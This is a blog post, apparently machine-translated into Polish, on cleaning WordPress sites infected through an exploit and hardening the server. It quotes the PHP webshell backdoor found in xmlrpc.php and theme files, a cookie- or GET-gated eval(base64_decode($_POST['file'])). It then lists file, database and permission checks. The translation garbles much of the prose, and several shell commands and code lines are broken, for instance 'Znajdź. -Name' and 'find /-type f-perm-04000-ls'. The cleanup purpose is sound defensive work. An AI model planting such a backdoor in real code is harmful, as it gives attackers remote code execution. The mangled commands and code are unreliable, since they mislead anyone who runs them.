WordPress Exploit - czyszczenie zagrożona plików i bezpieczeństwo SQL Server.

Zanim przeczytasz ten post, powinieneś zobaczyć , Aby coś zrozumieć. :)

Znaleźliśmy w kilku blogów na pliki stealthsettings.com, podobny do kodu poniżej virusarii wynikają z WordPress wykorzystać.:

<? Php if ($ _ GET [ ''] 573abcb060974771 == "") {8e96d1b4b674e1d2 eval (base64_decode ($ _ POST [ 'plik'])); exit; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcJeśli to powyższy plik xmlrpc.php z SennyAle w grep serwer, można zobaczyć, że istnieje całkiem sporo tego typu w kodzie źródłowym.

pppffiuuu

Czyszczenie zainfekowane pliki:

Ooookkkk ...
1. Najlepszym rozwiązaniem, po tym, jak backupI oczyszczone bazy danych jest wycierać akta WordPress (Można zachować wp-config.php i pliki, które nie odnoszą się wyłącznie platformę wp, po czym dokładnie sprawdzić) na serwerze i nie przesłać oryginalną wersję 2.5.1 (Podczas tego dokonać aktualizacji WP wersja :)) http://wordpress.org/download/ . Przetrzyj tym pliki motywu, jeśli nie ufa się ich uważnego sprawdzenia.

Wydaje się, że zostały naruszone oraz pliki tematów, które nie zostały wykorzystane, zanim na blogu i po prostu zmienić temat, nie rozwiąże problemu.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' plik '])); exit; ?}?> <? Php get_header (); ?>

2. Wyszukać i usunąć wszystkie pliki zawierające: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i pliku wp-info.txt, jeśli istnieje....

Znajdź. -Name "* _new.php"
Znajdź. -Name "* _old.php"
Znajdź. -Name "*. Jpgg"
Znajdź. -Name "* _giff"
Znajdź. -Name "* _pngg"
Znajdź. -Name "wp-info.txt"

3. w / Tmp , Wyszukiwanie i usuwanie folderów, takich jak tmpYwbzT2

Czyszczenie SQL :

1. w tabeli Table wp_options sprawdzić, czy nie jest usunąć linie: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Również w wp_options, przejdź do active_plugins i usunąć, jeśli istnieje plugin, który kończy się w jednym z rozszerzeń * _new.php, * _old.php, *. jpgg, *. giff, *. pngg lub inny numer wewnętrzny jest podejrzana, sprawdź dokładnie.

3. W tabeli wp_users, Czy jest użytkownik, który nie napisał nic w jego prawej, kolumna user_nicename. Usunąć tego użytkownika, ale należy zwrócić uwagę na numer na kolumnie ID. Użytkownik może korzystać z "WordPress" jako user_login i wydaje się być stworzony na 00: 00: 00 0000-00-00.

4. Przejdź do tabeli wp_usermeta i usunąć wszystkie linie należące ID powyżej.

Po wykonaniu tej sql czyszczenia, wyłączyć, a następnie włączyć jakiś plugin. (W blogu -> Pulpit -> Wtyczki)

Bezpieczny serwer:

1. Zobacz, jakie katalogi i pliki są "zapisywalny"(Chmod 777) i starają się umieścić na nich w chmod , które nie pozwolą na ich pisanie na każdym poziomie. (644 chmod, na przykład)

Znajdź. -Perm-2-ls

2. Zobacz, jakie pliki mają ustawiony bit suid lub sgid . Jeśli nie używasz te pliki umieścić na nich chmod 0 lub odinstalować pakiet, który zawiera. Są bardzo niebezpieczne, ponieważ wykonanie uprawnień "grupa"Lub"korzeń"A nie z normalnych uprawnień użytkowników do wykonywania tego pliku.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Sprawdź, które porty są otwarte i próby zamknięcia lub zabezpieczenia tych, które nie są używane.

netstat-an | grep-i słuchać

O nim. Widzę Szukaj w Google i inni mówią "Dobrze zrobiłeś!". No dobra masz zrobić ... ale co, jeśli google zaczyna zakaz wszystkie strony formowania JEST SPAM i umieścić trojanów (Trojan.Clicker.HTML) W ciasteczkach?

WordPress Exploit - czyszczenie zagrożona plików i bezpieczeństwo SQL Server.

O autorze

podstęp

Namiętnie o wszystkim, co oznacza gadżety i IT, piszę z przyjemnością stealthsettings.com od 2006 i lubię odkrywać z wami nowe rzeczy na temat komputerów i systemów operacyjnych macOS, Linux, Windows, iOS i Android.

1 Komentarzy

Zostaw komentarz